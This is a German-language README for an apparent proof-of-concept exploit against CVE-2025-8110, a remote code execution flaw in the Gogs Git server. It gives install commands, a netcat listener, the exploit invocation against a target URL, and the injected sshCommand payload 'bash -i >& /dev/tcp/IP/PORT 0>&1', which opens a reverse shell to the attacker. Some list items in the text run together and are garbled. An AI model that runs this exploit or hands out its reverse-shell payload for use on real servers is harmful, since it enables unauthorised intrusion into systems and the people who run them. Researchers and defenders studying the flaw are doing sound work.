
Proof-of-concept-Exploit für CVE-2025-8110, eine Gogs-RCE-Sicherheitslücke, die Path Traversal über symbolische Links und sshCommand-Injection ausnutzt, um eine Reverse Shell zu liefern.
Ein Proof of Concept (PoC) für CVE-2025-8110, eine kritische Schwachstelle in Gogs, die Remote-Code-Ausführung (RCE) durch Manipulation von .git/config mittels symbolischer Link-Umgehungen und sshCommand-Injection ermöglicht.
Dieser Exploit zielt auf einen Path-Traversal-Fehler in der Gogs-API-Inhaltsverwaltung ab. Ein authentifizierter Benutzer kann:
.git/config verweist.sshCommand injizieren, um eine Reverse Shell auszuführen, wenn der Server Git-Operationen durchführt.!, @) zu handhaben.Rich-Bibliothek.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
pip3 install -r requirements.txt
Starten Sie Ihren Listener:
nc -lvnp 6666
Führen Sie den Exploit aus:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
Argumente:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Wenn Gogs einen Git-Befehl ausführt, der Netzwerktransport erfordert (wie eine Mirror-Synchronisation oder eine interne Referenzprüfung), wird der sshCommand aufgerufen, was die Reverse Shell auslöst.
| Argument | Beschreibung |
|---|
-u, --url | Basis-URL der Ziel-Gogs-Instanz (z. B. http://target.htb:3000). |
-lh, --host | Angreifer-IP (LHOST), zu der die Reverse Shell zurückverbindet. |
-lp, --port | Listener-Port (LPORT) auf Ihrer Maschine. |
-p, --password | Passwort für das Konto pwnuser zur Authentifizierung. |
-x, --proxy | (Optional) Leitet den Datenverkehr über einen lokalen Proxy (Standard: http://localhost:8080). |